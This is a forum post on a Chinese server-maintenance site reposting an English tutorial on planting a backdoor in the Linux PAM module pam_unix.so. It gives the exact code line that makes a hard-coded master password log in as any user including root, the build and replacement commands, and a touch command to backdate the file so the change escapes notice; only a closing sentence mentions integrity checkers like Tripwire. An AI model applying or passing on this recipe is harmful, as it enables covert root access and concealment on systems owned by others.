服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 11717|回复: 0

Backdoor on Pam module pam_unix.so

[复制链接]
dirtysea 发表于 2011-11-6 04:15:16 | 显示全部楼层 |阅读模式
来源:http://hi.baidu.com/p3rlish/blog ... c64a5d4ec22640.html

这个东西,08年的时候某牛给我讲解过一次,不过没这么通俗易懂,今天看到之后发现这个写的还是不错的,分享一下

In this article I will show you how to modify the PAM module pam_unix.so to let us log on a system (Via SSH per example) using a master password, which can be used with every login on the box.

1. Download PAM Source

ftp://ftp.kernel.org/pub/linux/l ... ux-PAM-1.1.1.tar.gz
2. Unzip and edit the source file we are interested (pam_unix_auth.c)

tar -xvzf Linux-PAM-1.1.1.tar.gz
pico Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c
3. Search in the file the next string

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
4. Just after these lines add the next piece of code

if (strcmp(p,”secpass”)==0 ){retval = PAM_SUCCESS;}
Where secpass is the second password (our secret password). With this modification every login with a valid user on the system will accept this password ( root inclusive).

5. Go to the main source directory to configure and compile

./configure
make
This create our needed module in modules/pam_unix/.libs/pam_unix.so

6.Now we need to replace the old module with the new one. But before we will create a backup in case we need it later.

cp /lib/security/pam_unix.so /lib/security/pam_unix.so.orig
cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so
7. Test if it works. You can create a new SSH session to the system.

8. Something important to take into consideration is change the file’s modification date.We can do it with touch.

touch -t 200901022110 pam_unix.so
Following these steps you could have an alternative way to enter a system.

That’s why its so important to use a integrity checker on the system (like Tripwire).

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-29 07:37 , Processed in 0.198352 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表